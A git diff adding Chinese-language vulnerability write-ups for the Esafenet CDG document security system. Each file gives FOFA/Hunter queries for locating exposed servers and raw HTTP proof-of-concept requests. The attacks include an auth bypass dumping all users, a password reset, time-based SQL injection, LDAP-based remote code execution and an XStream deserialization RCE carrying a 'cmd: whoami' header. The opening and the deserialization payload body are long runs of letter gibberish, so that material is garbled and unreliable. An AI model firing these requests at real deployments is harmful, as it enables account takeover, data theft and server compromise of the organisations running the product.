MABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1708399929056-295114da-ae8a-4298-b8f5-0b25036708e5.png](./img/YqHsAYGn1uPt10CJ/1708399929056-295114da-ae8a-4298-b8f5-0b25036708e5-830387.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/np4v5751f729gwwy>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md b/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md
new file mode 100644
index 0000000..8c9a324
--- /dev/null
+++ b/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md
@@ -0,0 +1,35 @@
+# 亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞
+
+
+
+## FOFA
+
+```YAML
+body="/CDGServer3/index.jsp"	
+```
+
+## poc
+
+```java
+POST /CDGServer3/openapi/getAllUsers HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 27
+
+pageSize=10000&pageNumber=1
+
+
+
+
+POST /CDGServer3/rpc/userManage/userPwdReset.js HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 12
+
+userIds=test
+```
+
diff --git a/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md b/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md
new file mode 100644
index 0000000..33bd4ba
Binary files /dev/null and b/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md differ
diff --git a/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md
new file mode 100644
index 0000000..35f489e
--- /dev/null
+++ b/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 亿赛通电子文档安全管理系统ids存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统ids存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/c0SeDCIhywj7BmwP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-274143.png)
+
+# 四、漏洞复现
+```plain
+GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Upgrade-Insecure-Requests: 1
+```
+
+![1702456515765-85e20e74-35e6-43c1-9535-88b9bb56f52c.png](./img/c0SeDCIhywj7BmwP/1702456515765-85e20e74-35e6-43c1-9535-88b9bb56f52c-105707.png)
+
+sqlmap
+
+```plain
+GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)%20 HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Upgrade-Insecure-Requests: 1
+```
+
+![1702456548688-79eed2f9-fa8a-4c4b-8e7e-61bcda3b85c6.png](./img/c0SeDCIhywj7BmwP/1702456548688-79eed2f9-fa8a-4c4b-8e7e-61bcda3b85c6-737502.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmm1ig5i22zrmpdp>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md b/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md
new file mode 100644
index 0000000..ed33196
--- /dev/null
+++ b/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞
+
+亿赛通电子文档安全管理系统 /CDGServer3/logincontroller 接口存在远程代码执行漏洞。
+
+## fofa
+
+```yaml
+body="/CDGServer3/index.jsp"
+```
+
+## poc
+
+```java
+POST /CDGServer3/logincontroller HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+fromurl=/LdapAjax&token=1&command=testConnection&hosts=ldap://192.168.10.1:1379/CN=account,OU=exp,DC=exp,DC=com&users=account&dns=CN=account,OU=exp,DC=exp,DC=com&dns2=OU=exp,DC=exp,DC=com&type=0&pwds=123456
+```
+
diff --git a/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..f74bbc6
--- /dev/null
+++ b/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统offlineApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统offlineApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Rr2cMZleZrlHwlbu/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-405249.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/offlineApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.31.208:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACAD